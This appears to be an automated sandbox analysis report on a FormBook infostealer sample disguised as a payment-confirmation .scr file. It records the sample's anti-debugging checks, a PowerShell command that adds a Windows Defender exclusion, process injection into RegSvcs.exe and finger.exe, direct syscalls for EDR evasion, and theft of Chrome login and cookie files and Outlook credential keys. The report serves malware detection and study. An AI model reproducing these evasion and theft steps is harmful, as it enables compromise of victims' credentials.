Binary or memory string: <p><a href="https://www.star.ne.jp/"><img src="data:image/gif;base64,R0lGODlhmAAbAPcAAJORkXPC5+vr6o6NjAmT1SSf2ujo6K3b8R6c2YyKihCW1vb29vHx8eLi4trv+Wm+5qalpc/OzmK65LTe8qLW702w4ZaVlJ6dne3t7ZrS7jyp3oXJ6tLr939+fcbm9XZ0dACDz0lHRun1+xWY13p4eFhWVSOe2ubm5vj4+KTX8MjIyECr3+Tk5ACK0sTExCKe2VCy4TGl3OHy+l245OHh4cHk9fX6/VS04tPT01ZVVEE/PqnZ8AaS1QCN0z08Ozw6OURDQlxaWU9NTIiHh0eu4Pr9/gSR1F5dXGRjYmNhYYqJiFNRUM7p9wCI0VtZWbjg85qZmXx7emdlZYF/fyag2r29vBiZ2ACF0A2U1nh3dtbt+HRzcoKBgP///29ubb7j9BKX17Ld8jmn3YSCgnnE6GxramhnZgqT1QaR1AKQ1AKP1Dg2NSCd2cHBwEZEQ93c3CGd2fb29Y2Miyqi2/T09PPz89nY2KGgoL6+ve7u7la14vz8/N/f34mIh8fGxjs5OMrJyfr6+mBeXfv7+6inpjk3NmloZ62srNbW1rKxsd7e3vX19To4N8LCwSGe2e/v7/7+/kdFRKuqqVpYV1VTUkJAP0Os3/Ly8tbV1Q+W1pybmqiop5GQj11cW/39/cbFxUNBQExKSa6tra+urabY8O/u7rm4uLq6udjY18vKyv7//yig2ra1taqpqZ2cm1JQT2a85eDf37y7u09OTff8/ktJSE5MS6Ggn/r5+bq5uJCPj7++voWEg/Py8tXU1MPCwtrZ2cro9qKhoWW75aurqg+V1p/V77W0tLOzsra2tWy+5pWUk7Cvryaf2kWt3zam3ZeWlimi25mYl0pIRxyb2IvM62VkYxma2KCfnsTDw4GAf1ZUU4eGhRSX1xOT1QKQ01i146+vruf0+8Dj9MjHx4HI6j89PLe2tuTz+/L5/dDQz+33/MzMzM7NzQB8zRCV1ufn5nNxcJDO7OPj4q/c8ayrq9ra2tHQ0NLR0bGwsLOysaOioqmoqNTU06XY7wyU1SH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxMzggNzkuMTU5ODI0LCAyMDE2LzA5LzE0LTAxOjA5OjAxICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1wTU06T3JpZ2luYWxEb2N1bWVudElEPSJ4bXAuZGlkOjk5NTgzMjIwLWJlMzItMzE0OC05YTM2LThjMjIwOGQwNjhkMyIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDpFNDk5NUIzQzFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpFNDk5NUIzQjFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxNyAoV2luZG93cykiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo3NWU3N2M0ZC1iMjc5LWJhNGYtYjg0Ny04OGRhN2Y4NTFiYjIiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6OTk1ODMyMjAtYmUzMi0zMTQ4LTlhMzYtOGMyMjA4ZDA2OGQzIi8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+Af/+/fz7+vn49/b19PPy8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuqqainpqWko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA8ODQwLCgkIBwYFBAMCAQAAIfkEAAAAAAAsAAAAAJgAGwAACP8Auwgc2IUDrBhzEipUqEwLwYcQI0qcSLGixYsYM2qM+ISNx48vFPAgMLIAHA4bU6pcybJlygkgP6aJUYFIhRjdTFhyybOnz58Tw8SEw6YJjHQEVxBgIwOo06dQMR4YWvQGRDFLm1K0B2FAlCGuPj2KOjECtj5f90WIQ/YpKapGrxrRqWoinzJr8updAwDiAgZQVXTaWygvq7ZAU8CdIZcoE7s/COvFM3DeqA6RhD11IVmvIsQ+ayxuzKYGxcF6O2gCkARUnoGC9PJzusCHXh3cNCUoUQK0T0tDjcB6uC5GE8eQIOvFQbBOcoFIZEtkwGLsRQyeBFa5Taf5dHiDLNb/wZ59owA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00A80101 rdtsc

3_2_00A80101

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00A307AC NtCreateMutant,LdrInitializeThunk,

3_2_00A307AC

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A20080 mov ecx, dword ptr fs:[00000030h]	3_2_00A20080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A200EA mov eax, dword ptr fs:[00000030h]	3_2_00A200EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A426F8 mov eax, dword ptr fs:[00000030h]	3_2_00A426F8

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryInformationProcess: Direct from: 0x774CFAFA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtCreateUserProcess: Direct from: 0x774D093E	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtCreateKey: Direct from: 0x774CFB62	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQuerySystemInformation: Direct from: 0x774D20DE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtQueryDirectoryFile: Direct from: 0x774CFDBA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtWriteVirtualMemory: Direct from: 0x774D213E	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtCreateFile: Direct from: 0x774D00D6	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetTimer: Direct from: 0x774D021A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenFile: Direct from: 0x774CFD86	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetInformationThread: Direct from: 0x774E9893	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenKeyEx: Direct from: 0x774CFA4A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtAllocateVirtualMemory: Direct from: 0x774CFAE2	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtResumeThread: Direct from: 0x774D008D	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenKeyEx: Direct from: 0x774D103A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtUnmapViewOfSection: Direct from: 0x774CFCA2	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtDelayExecution: Direct from: 0x774CFDA1	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetInformationProcess: Direct from: 0x774CFB4A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetInformationThread: Direct from: 0x774CF9CE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtReadFile: Direct from: 0x774CF915	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtMapViewOfSection: Direct from: 0x774CFC72	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtCreateThreadEx: Direct from: 0x774D08C6	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtDeviceIoControlFile: Direct from: 0x774CF931	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtRequestWaitReplyPort: Direct from: 0x753C6BCE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryValueKey: Direct from: 0x774CFACA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenSection: Direct from: 0x774CFDEA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtProtectVirtualMemory: Direct from: 0x774D005A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtWriteVirtualMemory: Direct from: 0x774CFE36	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtRequestWaitReplyPort: Direct from: 0x756F8D92	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryVolumeInformationFile: Direct from: 0x774CFFAE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtNotifyChangeKey: Direct from: 0x774D0F92	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryAttributesFile: Direct from: 0x774CFE7E	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtReadVirtualMemory: Direct from: 0x774CFEB2	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetTimer: Direct from: 0x774E98D5	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtSetInformationFile: Direct from: 0x774CFC5A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQuerySystemInformation: Direct from: 0x774CFDD2	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\finger.exe

Thread APC queued: target process: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Queries volume information: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Code function: 6_2_61E96BE0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

6_2_61E96BE0

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
